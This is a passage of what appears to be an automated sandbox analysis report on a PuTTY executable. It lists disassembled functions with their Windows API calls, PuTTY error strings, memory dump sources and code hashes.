                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: DeleteMenu$Message
                                                          • String ID: %s Error$Unable to open connection to%s%s$Unable to open terminal:%s
                                                          • API String ID: 1035315089-2786405544
                                                          • Opcode ID: 5da7f9251fe89786a952673a7e2e62702b5e7534193b3590783bdb2e9f68eba5
                                                          • Instruction ID: 984de8e06e4b5f38eec2a09d74408811958313fb8961f3b22c4514ef140c1c49
                                                          • Opcode Fuzzy Hash: 5da7f9251fe89786a952673a7e2e62702b5e7534193b3590783bdb2e9f68eba5
                                                          • Instruction Fuzzy Hash: 2F51A72760968252EB50FB26E8517ABF761EB84BD4F844032DF8E47796DF3EE0419314
                                                          Function 00007FF738A641C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 111fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateFileA.KERNEL32 ref: 00007FF738A642B0
                                                          • GetLastError.KERNEL32 ref: 00007FF738A6433A
                                                            • Part of subcall function 00007FF738A644E0: GetCommState.KERNEL32 ref: 00007FF738A64509
                                                            • Part of subcall function 00007FF738AA6FD0: CreateEventA.KERNEL32 ref: 00007FF738AA7024
                                                            • Part of subcall function 00007FF738AA6FD0: InitializeCriticalSection.KERNEL32 ref: 00007FF738AA7084
                                                            • Part of subcall function 00007FF738AA6FD0: CreateEventA.KERNEL32 ref: 00007FF738AA7094
                                                            • Part of subcall function 00007FF738AA6FD0: CreateThread.KERNEL32 ref: 00007FF738AA70D3
                                                            • Part of subcall function 00007FF738AA6FD0: CloseHandle.KERNEL32 ref: 00007FF738AA70E1
                                                            • Part of subcall function 00007FF738AA6C70: CreateEventA.KERNEL32 ref: 00007FF738AA6CC4
                                                            • Part of subcall function 00007FF738AA6C70: InitializeCriticalSection.KERNEL32 ref: 00007FF738AA6D0D
                                                            • Part of subcall function 00007FF738AA6C70: CreateEventA.KERNEL32 ref: 00007FF738AA6D1D
                                                            • Part of subcall function 00007FF738AA6C70: CreateThread.KERNEL32 ref: 00007FF738AA6D5C
                                                            • Part of subcall function 00007FF738AA6C70: CloseHandle.KERNEL32 ref: 00007FF738AA6D6A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread$CommErrorFileLastState
                                                          • String ID: %s%s$Opening '%s': %s$Opening serial device %s$\\.\
                                                          • API String ID: 2954106191-1737485005
                                                          • Opcode ID: c00d760b2c6a5779c1a5ba483eaa3d84c880ad4dedfa82bc057ec96407d812aa
                                                          • Instruction ID: 63c32c8f4230544576eca173cd973739d043ba9afba42b88f998fab795325a24
                                                          • Opcode Fuzzy Hash: c00d760b2c6a5779c1a5ba483eaa3d84c880ad4dedfa82bc057ec96407d812aa
                                                          • Instruction Fuzzy Hash: C741F723B06B4252EA10BB12E85076AF350FB85BE4F808231DE5D07BD6EF3DE1419354
                                                          Function 00007FF738AD9F00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104pipeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: NamedPipe$CloseConnectCreateErrorHandleLast
                                                          • String ID: Error while listening to named pipe: %s
                                                          • API String ID: 3669627233-1472817922
                                                          • Opcode ID: 9f7b0a46128b179491b5f2cb1417faaca1884a16d0adb702640206d5d4f83d27
                                                          • Instruction ID: 5ba2ca67063bb7d23ef0e471d2ef156608260983428aa58d9cb1bdf790baa88b
                                                          • Opcode Fuzzy Hash: 9f7b0a46128b179491b5f2cb1417faaca1884a16d0adb702640206d5d4f83d27
                                                          • Instruction Fuzzy Hash: A241E523609A4296E720AB16F41077AF3A0FF89B94F940231EE8E477A4DF7EE4459314
                                                          Function 00007FF738A54020 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$CapturePlacement$BeepLongMessageRelease
                                                          • String ID: ,
                                                          • API String ID: 3018360031-3772416878
                                                          • Opcode ID: 8cc3ee3a77b55f15fcb0c94ec58535db9b7b3767488d8d5d534f8ad0db8d840c
                                                          • Instruction ID: 26bb05f08781dc84f8da39cc60ae4f001cb89b476d2f7ce23890f9e0b1e93b1f
                                                          • Opcode Fuzzy Hash: 8cc3ee3a77b55f15fcb0c94ec58535db9b7b3767488d8d5d534f8ad0db8d840c
                                                          • Instruction Fuzzy Hash: AA41F9E3E0E14265F768B7339414BBDE681BF91B80F840231D68D026C5DF7EA6C5E229
                                                          Function 00007FF738A73D90 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00007FF738A73BE0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73C9D
                                                            • Part of subcall function 00007FF738A73BE0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73D0B
                                                            • Part of subcall function 00007FF738A73BE0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A73DC8), ref: 00007FF738A73D15
                                                          • GetCurrentProcess.KERNEL32 ref: 00007FF738A73E88
                                                          • GetLastError.KERNEL32 ref: 00007FF738A73EED
                                                          • LocalFree.KERNEL32 ref: 00007FF738A73F17
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: AllocateErrorInitializeLast$CurrentFreeLocalProcess
                                                          • String ID: Could not restrict process ACL: %s$Unable to set process ACL: %s$unable to construct ACL: %s
                                                          • API String ID: 4156538165-2118130043
                                                          • Opcode ID: c26483cee9904842a2d3f2f73f9f46a8c568db35b1819ee42160507be448fe9d
                                                          • Instruction ID: 2ee7e748dc7a86035fa66a9e55f059d8e2eae55b6f2b924eca53707b8b78d3d0
                                                          • Opcode Fuzzy Hash: c26483cee9904842a2d3f2f73f9f46a8c568db35b1819ee42160507be448fe9d
                                                          • Instruction Fuzzy Hash: 0C419F22A0DA8291FB60AB15F4157AAE3A0FF85784F900131EA8C07B54EF7FD446AB15
                                                          Function 00007FF738A6CC20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: htons$inet_ntoainet_ntop
                                                          • String ID: %s:%d$[%s]:%d
                                                          • API String ID: 1873631531-2542140192
                                                          • Opcode ID: 2b29381e440b41626c3693cc85a4ff4459eab8bc113adac27ad787020a841a80
                                                          • Instruction ID: 343d168394584231577681653f2ed36caa885ca07d5ebef847c0fb4c638197e3
                                                          • Opcode Fuzzy Hash: 2b29381e440b41626c3693cc85a4ff4459eab8bc113adac27ad787020a841a80
                                                          • Instruction Fuzzy Hash: 4C41B17260969296EB30AF15E4107BEF7A0FB44780F808135DACE47A94EF3EE445D768
                                                          Function 00007FF738A37B50 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Menu$DeleteInsert
                                                          • String ID: %s (inactive)$&Restart Session
                                                          • API String ID: 985044671-219138112
                                                          • Opcode ID: 286b43d1dc6695b4bb2b938c4a1364662aad57256ae4f11836091118e94e36fa
                                                          • Instruction ID: 3e6cf23fa25e2892da7b28f23bfb0bf277b3f5e00d9aed843a16d33b3f184fd8
                                                          • Opcode Fuzzy Hash: 286b43d1dc6695b4bb2b938c4a1364662aad57256ae4f11836091118e94e36fa
                                                          • Instruction Fuzzy Hash: ED218D2B715A4193EB20AB2AE460B6AE361FB85BD4F844031CF8E03B61CF3EE445D314
                                                          Function 00007FF738AD9920 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: DescriptorLocalSecurity$Free$AllocCreateDaclErrorFormatInitializeLastMessageMutexObjectOwnerSingleWait
                                                          • String ID: CreateMutex("%s") failed: %s
                                                          • API String ID: 1132015839-2623464464
                                                          • Opcode ID: a15bbfb5595d817062a9d87dfb6caacd10874586bf9c92be9f6c495149f264c5
                                                          • Instruction ID: 64cb3b4684c9634d071d15e37fd7181843a90c21e7b07a7dced0361b5fbeca60
                                                          • Opcode Fuzzy Hash: a15bbfb5595d817062a9d87dfb6caacd10874586bf9c92be9f6c495149f264c5
                                                          • Instruction Fuzzy Hash: 4121F82360EB8251EA50AB61A45077AF3A0FF89790F840234EE8D477A4DF3ED4459714
                                                          Function 00007FF738B019C8 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019D7
                                                          • FlsGetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B019EC
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A0D
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A3A
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A4B
                                                          • FlsSetValue.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A5C
                                                          • SetLastError.KERNEL32(?,?,?,00007FF738AF153B,?,?,?,00007FF738AFAB11), ref: 00007FF738B01A77
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Value$ErrorLast
                                                          • String ID:
                                                          • API String ID: 2506987500-0
                                                          • Opcode ID: a80bd8287d4a02c82c82fc9d3c13edde732b8b1964cf5f6f4dee72e7713fa1b7
                                                          • Instruction ID: 6b8ac5563bbd1079fdb2cc18957554480f3cc75524644d0e5305b89ce9540ddd
                                                          • Opcode Fuzzy Hash: a80bd8287d4a02c82c82fc9d3c13edde732b8b1964cf5f6f4dee72e7713fa1b7
                                                          • Instruction Fuzzy Hash: 7221BEA3A0C24362FA6CB721565187EE2429F447A0F944734D93E076E2DF3EB845622B
                                                          Function 00007FF738A37C70 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Cursor$ClassLoadLongShow
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$false && "Bad busy_status"
                                                          • API String ID: 1160125251-2820030088
                                                          • Opcode ID: 590d1deca98dead610a2abe45b045ea7ce18ae4f2d50d21b19b543372c4da44b
                                                          • Instruction ID: 6e12a5a881273232659a34e780552f074facee5781e0a4d4a9603bcefcf76c5a
                                                          • Opcode Fuzzy Hash: 590d1deca98dead610a2abe45b045ea7ce18ae4f2d50d21b19b543372c4da44b
                                                          • Instruction Fuzzy Hash: B3112592E0E14365F7A06326F884679E740AF45781F944231CD0E42394CE3FA849E325
                                                          Function 00007FF738A5AD92 Relevance: 10.6, APIs: 7, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: Window$CompatibleCreateDeleteExtentInvalidateObjectPoint32ProcRectSelectText
                                                          • String ID:
                                                          • API String ID: 2525508449-0
                                                          • Opcode ID: 946eaf59e17a8cd839a389946fb007ce393ae0ea006f40bf7270afd086559598
                                                          • Instruction ID: 4de7ede7950e0de7490911a1d521a4f9aee5e6e9ec0d8cb76c71882ae2d24361
                                                          • Opcode Fuzzy Hash: 946eaf59e17a8cd839a389946fb007ce393ae0ea006f40bf7270afd086559598
                                                          • Instruction Fuzzy Hash: 6F11E3A3B0920243EB54EB26B81463AE351FB8AB94F840135DE0F07B14DE3EE0469A18
                                                          Function 00007FF738B16B48 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                          • String ID: CONOUT$
                                                          • API String ID: 3230265001-3130406586
                                                          • Opcode ID: e72ab24883a4aeed251333585f7eba344b1e3b938fb2565dcc17371d7b918771
                                                          • Instruction ID: 77eb45ea0ceb2c3070839cf1e291efacbba8447982ebd6b59a9751844b6347f9
                                                          • Opcode Fuzzy Hash: e72ab24883a4aeed251333585f7eba344b1e3b938fb2565dcc17371d7b918771
                                                          • Instruction Fuzzy Hash: BB11D663718A4282E750AB02F854326F7A1FB49FE0F844334DA1D87790DF7DD9448719
                                                          Function 00007FF738A38580 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 35windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: ObjectPaletteReleaseSelectStock
                                                          • String ID: /home/simon/mem/.build/workdirs/bob-qvbm9mtj/putty/windows/window.c$wgs->term_hwnd$wgs->wintw_hdc
                                                          • API String ID: 3714893027-1489009455
                                                          • Opcode ID: 2792394f4c5e16a1c4420a983641462e13661c39d9876bbeae5a0cce8b336482
                                                          • Instruction ID: 9e51b8cb7ae1217aecae94dd9252d63cf4de5154e884b71db8fa477df77ae0de
                                                          • Opcode Fuzzy Hash: 2792394f4c5e16a1c4420a983641462e13661c39d9876bbeae5a0cce8b336482
                                                          • Instruction Fuzzy Hash: B201C062A09613E2EA206715F5057B4E321EF45BC0F945035CA0E036918F7FF445A329
                                                          Function 00007FF738AFABF8 Relevance: 9.4, APIs: 6, Instructions: 415COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899192846.00007FF738B6D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_7ff738a30000_putty.jbxd
                                                          Similarity
                                                          • API ID: _invalid_parameter_noinfo
                                                          • String ID:
                                                          • API String ID: 3215553584-0
                                                          • Opcode ID: 06a6e71633e3dfa68ccbf558cc1962882461144757633eb0d3fffcf3c59d29a3
                                                          • Instruction ID: 860eadc8347ca044489a2c72bd0a91386bde136dcdd6b129d1c0995dd28877ea
                                                          • Opcode Fuzzy Hash: 06a6e71633e3dfa68ccbf558cc1962882461144757633eb0d3fffcf3c59d29a3
                                                          • Instruction Fuzzy Hash: 75F1D733A0B6565AE751AB25C850ABDFBE0AB11F84FE48033C69C47381DF3EB455A718
                                                          Function 00007FF738A383D0 Relevance: 9.1, APIs: 6, Instructions: 114COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2899045378.00007FF738A31000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                          • Associated: 00000003.00000002.2899031683.00007FF738A30000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899104684.00007FF738B18000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5C000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899133329.00007FF738B5E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B61000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000003.00000002.2899164148.00007FF738B69000.00000002.00000001.01000000.00000009.sdmpDownload File
